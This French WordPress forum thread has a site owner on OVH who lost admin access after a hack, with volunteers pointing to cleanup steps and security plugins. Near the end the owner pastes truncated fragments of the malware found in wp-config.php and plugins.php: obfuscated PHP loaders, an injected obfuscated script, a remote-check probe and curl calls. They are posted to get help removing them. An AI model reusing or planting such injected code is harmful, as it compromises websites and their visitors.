- WordPress :6.7
- Statut : non résolu
- Ce sujet contient 29 réponses, 4 participants et a été mis à jour pour la dernière fois par
, le il y a 3 mois et 1 semaine.
-
Messages
-
Bonjour,
Ma configuration WP actuelle
- Version de PHP/MySQL :
- Thème utilisé :
- Extensions en place :
- Nom de l’hébergeur : OVH
- Adresse du site :XXX.X
Problème(s) rencontré(s) :
Je n’arrive plus à accéder au tableau de bord wordpress pour effectuer des modifs de contenu de mon site. Lorsque j’essaie de me connecter via les liens placés en favoris sur mon ordinateur >> rien ne se passe. J’ai essayé de me connecter à wordpress directement et il semble ne pas trouver de compte avec mon adresse e-mail. Est ce un piratage? Mon site est toujours en ligne et fonctionne normalement pour l’instant.
d’avance merci —
Bonjour,
Oui, c’est un piratage. Il ne vous reste plus qu’à suivre entièrement ce tuto et à vous armer d’un peu de patience. Ensuite, si vous n’en avez pas déjà , il faudra installer un plugin de sécurité pour éviter que cela se reproduise.
Bonjour, une petite précision : l’extension de sécurité ne peut pas vous protéger contre tous les piratages mais permettra de contenir les attaques, vous préviendra lorsque quelque chose de suspect se passera sur votre site et colmatera quelques failles. Les extensions de sécurité que je conseille : NinjaFirewall (léger sur le site et efficace), SecuPress (français) et Wordfence (la plus populaire mais lourde) cf mon billet https://www.echodesplugins.li-an.fr/plugins/un-wordpress-vraiment-protege/.
Bonjour,
Je précise à mon tour :
- que l’une des extensions conseillées par Li-An devra être installée à la fin du tuto de nettoyage, que vous devez suivre en totalité
- que ce tuto nécessite de prendre du temps, mais pas de compétences informatiques particulières. Chaque fois que des opérations un peu « techniques » sont conseillées, les instructions sont détaillées et/ou renvoient vers un tuto en images.
L’idéal, c’est de savoir déjà comment accéder à la base de données (PhpMyAdmin, chez votre hébergeur) et au FTP avec Filezilla ou équivalent.
Vous aurez besoin de vos identifiants chez OVH pour le faire. - qu’on pourra vous aider / vous guider dans la mise en œuvre si besoin
Merci pour vos réponses. Je cale déjà à ce stade-ci: « comment accéder à la base de données (PhpMyAdmin, chez votre hébergeur) et au FTP avec Filezilla ou équivalent ».
Si j’essaie de rentrer sur wordpress et le tableau de bord, c’est impossible et le support wordpress IA me dit qu’il ne connaît pas mon identifiant? …
Si j’essaie via OVH et leur support, ils me disent qu’ils ne voient aucun problème avec mon site et son hébergement.
L’accès à phpMyAdmin et au FTP est indépendant de l’accès à WP.
D’après la doc OVH phpMyAdmin https://help.ovhcloud.com/csm/fr-web-cloud-db-connecting-database-server?id=kb_article_view&sysparm_article=KB0051462
FTP https://docs.ovh.com/fr/hosting/mutualise-guide-utilisation-filezilla/
Et comme vous ne maîtrisez pas trop l’utilisation de WP https://www.echodesplugins.li-an.fr/tutoriaux/mon-premier-wordpress/
Bonjour,
Pur des explications sur le FTP (chez OVH) regardez cette petite vidéo.
Pour accéder à votre base de données chez OVH:
CHEZ OVH
a. Allez dans votre espace client
b. Hébergement
c. Onglet base de données
d. A droite les …, cliquer
e. Liste déroulante en bas « accéder à phpmyadmin
f. Entrez votre mot de passe phpmyadmin (pas le mdp wordpress).Merci à nouveau pour vos contributions. J’aimerais vraiment pouvoir progresser dans le tuto. Malheureusement, je pense que mon site a été sérieusement piraté et est perdu… Je joins quelques captures écrans mais en gros: impossible de me connecter à phpMyAdmin, pas de résultat trouvé dans le Web Cloud Database et avec FTP via Filezilla: impossible de renommer plugins et themes :-//
Un piratage du site n’affecte pas la connexion FTP ni phpMyAdmin qui sont gérés par OVH directement. Il faut absolument les contacter et leur parler de ces blocages et manques divers.
Update: j’ai finalement réussi à me connecter à phpMyAdmin après tentative changement de mot de passe et attente validation de OVH. J’avance patiemment dans le tuto. Question: pour le nettoyage des fichiers, je ne vois pas vraiment ce qu’il faut enlever (voir fichier joint). D’avance merci.
il s’agit des fichiers wp-config (début du fichier et la toute fin du fichier) et plugins.php.
Pourriez vous me dire si c’est possible de laisser tomber mon site et d’en refaire un? Et dans ce cas, comment faire en sorte que le nom de domaine artduchi-liege.be ne soit plus redirigé vers le piratage? J’envisage cette solution peut être plus simple pour moi au final et plus intéressante. L’occasion de faire un grand refresh et je voulais de toute façon faire un nouveau site http://www.tenjinchi-liege.be pour moi avec mes autres activités tout en gardant artduchi-liege.be plus générique en tant que « vitrine ». En attendant, j’ai redirigé toutes mes pages fb/insta/linkedin/trouver-un-cours vers le site belge de mon école de tai chi (www.artduchi.be) pour ne pas créer de stress ou confusion pour les visiteurs éventuels.
Merci d’avance pour vos réponses/contributions/éclairages ^^
En effet, tout ce code est de la grosse cochonceté. Il faudrait copié/collé ici le contenu du fichier en entier pour que l’on vous dise quoi supprimer exactement.
Le site est redirigé parce qu’il est piraté. Une fois nettoyé, ce ne sera plus le cas. Vous pouvez aussi refaire un site tout neuf si vous le désirez.
Merci.
Voici le copié collé:
****************************wp config
<?php /*Leafmail3*/goto o1QFr; wasj3: $ZJUCA($jQ0xa, $RTa9G); goto wYDtx; IuHdj: $egQ3R = « \147\172\151 »; goto ChKDE; TpHVE: $cPzOq .= « \157\x6b\x6b »; goto vgltl; gmVrv: $Mvmq_ .= « \…etc
<?php
/**
* La configuration de base de votre installation WordPress.
*
* Ce fichier contient les réglages de configuration suivants : réglages MySQL,
* préfixe de table, clés secrètes, langue utilisée, et ABSPATH.
* Vous pouvez en savoir plus à leur sujet en allant sur
* {@link http://codex.wordpress.org/fr:Modifier_wp-config.php Modifier
* wp-config.php}. C’est votre hébergeur qui doit vous donner vos
* codes MySQL.
*
* Ce fichier est utilisé par le script de création de wp-config.php pendant
* le processus d’installation. Vous n’avez pas à utiliser le site web, vous
* pouvez simplement renommer ce fichier en « wp-config.php » et remplir les
* valeurs.
*
* @package WordPress
*/// ** R̩glages MySQL РVotre h̩bergeur doit vous fournir ces informations. ** //
/** Nom de la base de données de WordPress. */
define(‘DB_NAME’, ‘xxx’);/** Utilisateur de la base de données MySQL. */
define(‘DB_USER’, ‘xxx’);/** Mot de passe de la base de données MySQL. */
define(‘DB_PASSWORD’, ‘xxx’);/** Adresse de l’hébergement MySQL. */
define(‘DB_HOST’, ‘xxx’);/** Jeu de caractères à utiliser par la base de données lors de la création des tables. */
define(‘DB_CHARSET’, ‘utf8mb4’);/** Type de collation de la base de données.
* N’y touchez que si vous savez ce que vous faites.
*/
define(‘DB_COLLATE’, »);/**#@+
* Clés uniques d’authentification et salage.
*
* Remplacez les valeurs par défaut par des phrases uniques !
* Vous pouvez générer des phrases aléatoires en utilisant
* {@link https://api.wordpress.org/secret-key/1.1/salt/ le service de clefs secrètes de WordPress.org}.
* Vous pouvez modifier ces phrases à n’importe quel moment, afin d’invalider tous les cookies existants.
* Cela forcera également tous les utilisateurs à se reconnecter.
*
* @since 2.6.0
*/
definexxx
define(‘xxx’);
define(‘xxx’);
define(‘xxx{‘);
define(‘xxx’);
define(‘xxx);
define(‘xxx1’);
define(‘NONCE_SALT’, ‘]2XGaLtci<6O</Wcr3mBW:x6d|Qf!MM@bpC79(]iW1cOR@9!5/q=vzxZ2|:.L/Ug’);
/**#@-*//**
* Préfixe de base de données pour les tables de WordPress.
*
* Vous pouvez installer plusieurs WordPress sur une seule base de données
* si vous leur donnez chacune un préfixe unique.
* N’utilisez que des chiffres, des lettres non-accentuées, et des caractères soulignés !
*/
$table_prefix = ‘xx_’;/**
* Pour les développeurs : le mode déboguage de WordPress.
*
* En passant la valeur suivante à « true », vous activez l’affichage des
* notifications d’erreurs pendant vos essais.
* Il est fortemment recommandé que les développeurs d’extensions et
* de thèmes se servent de WP_DEBUG dans leur environnement de
* développement.
*
* Pour plus d’information sur les autres constantes qui peuvent être utilisées
* pour le déboguage, rendez-vous sur le Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
define(‘WP_DEBUG’, false);/* C’est tout, ne touchez pas à ce qui suit ! */
/** Chemin absolu vers le dossier de WordPress. */
if ( !defined(‘ABSPATH’) )
define(‘ABSPATH’, dirname(__FILE__) . ‘/’);/** Réglage des variables de WordPress et de ses fichiers inclus. */
require_once(ABSPATH . ‘wp-settings.php’);
ob_start();
?>
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();…etc****************************wp plugins
<?php ?><?php error_reporting(0); if(isset($_REQUEST[« ok »])){die(« >ok<« );}…etc
?>
<?php
goto w85TN; qitG2: $SS8Fu .= « \x2e\61\x30 »; …………………………….curl_setopt($xM315, CURLOPT_RETURNTRANSFER, true); goto eUTqI; zihO_: curl_setopt($xM315, CURLOPT_SSL_VERIFYPEER, false); goto aS7Cq; T3ghY: }****************************wp plugins/fin
- Vous devez être connecté pour répondre à ce sujet.